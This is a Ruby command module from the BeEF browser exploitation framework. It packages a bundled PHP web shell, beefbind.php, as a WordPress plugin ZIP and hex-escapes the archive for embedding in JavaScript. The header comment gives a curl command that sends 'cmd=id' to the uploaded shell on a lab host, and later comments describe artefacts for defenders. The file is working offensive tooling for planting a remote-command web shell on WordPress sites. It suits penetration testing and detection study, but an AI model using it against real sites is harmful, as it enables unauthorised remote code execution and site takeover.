#
# Copyright (c) Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# This is a rewrite of the original module misc/wordpress_post_auth_rce.
#
# Original Author: Bart Leppens
# Rewritten by Erwan LR (@erwan_lr | WPScanTeam)
#
# To be executed, the request needs a BEEF header with the value of the auth_key option, example:
# curl -H 'BEEF: c9c3a2dcff54c5e2' -X POST --data 'cmd=id' http://wp.lab/wp-content/plugins/beefbind/beefbind.php
#
require 'digest/sha1'
require_relative '../wordpress_command'
# BeEF command module that packages the bundled beefbind.php template as a
# WordPress plugin ZIP and exposes the auth key as a module option.
#
# Defender-relevant artefacts visible in this file: the archive contains a
# single entry named "beefbind.php", and the file header shows requests to it
# carrying a "BEEF" HTTP header whose value is the auth_key option.
class Wordpress_upload_rce_plugin < WordPressCommand
  # Builds the plugin ZIP in memory and returns it as a JS-embeddable string.
  # According to the original comment this is called from command.js, so the
  # archive is regenerated on each use (including automated rules) and picks
  # up any local edits to beefbind.php.
  #
  # @param auth_key [String] value of the auth_key option; only its SHA-1 hex
  #   digest is written into the PHP template, never the key itself
  # @return [String] the ZIP bytes, each rendered as a literal \xNN escape
  #   (four characters per byte)
  def self.generate_zip_payload(auth_key)
    template_path = File.join(File.dirname(__FILE__), 'beefbind.php')

    archive = Zip::OutputStream.write_buffer do |zip|
      zip.put_next_entry("beefbind.php")

      php_source = File.read(template_path).to_s
      # The template carries a #SHA1HASH# placeholder; it is replaced with the
      # unsalted SHA-1 hex digest of the key.
      # NOTE(review): how beefbind.php compares the incoming header against
      # this digest is not visible here - confirm against the template.
      php_source.gsub!(/#SHA1HASH#/, Digest::SHA1.hexdigest(auth_key))

      zip.write(php_source)
    end

    # write_buffer hands back the buffer positioned at its end; go back to the
    # start before reading the whole archive out.
    archive.rewind
    raw_zip = archive.sysread

    # Hex-escape every byte so the binary archive survives being placed inside
    # a JavaScript string literal.
    raw_zip.each_byte.each_with_object('') do |byte, escaped|
      escaped << "\\" + ("x%02X" % byte)
    end
  end

  # Module options: everything the parent class defines plus the auth key.
  #
  # The default key is SecureRandom.hex(8), i.e. 8 random bytes rendered as
  # 16 hex characters, generated anew on every call to this method.
  #
  # @return [Array<Hash>] option definitions
  def self.options
    inherited = super()
    auth_key_option = {
      'name' => 'auth_key',
      'ui_label' => 'Auth Key',
      'value' => SecureRandom.hex(8)
    }

    inherited + [auth_key_option]
  end
end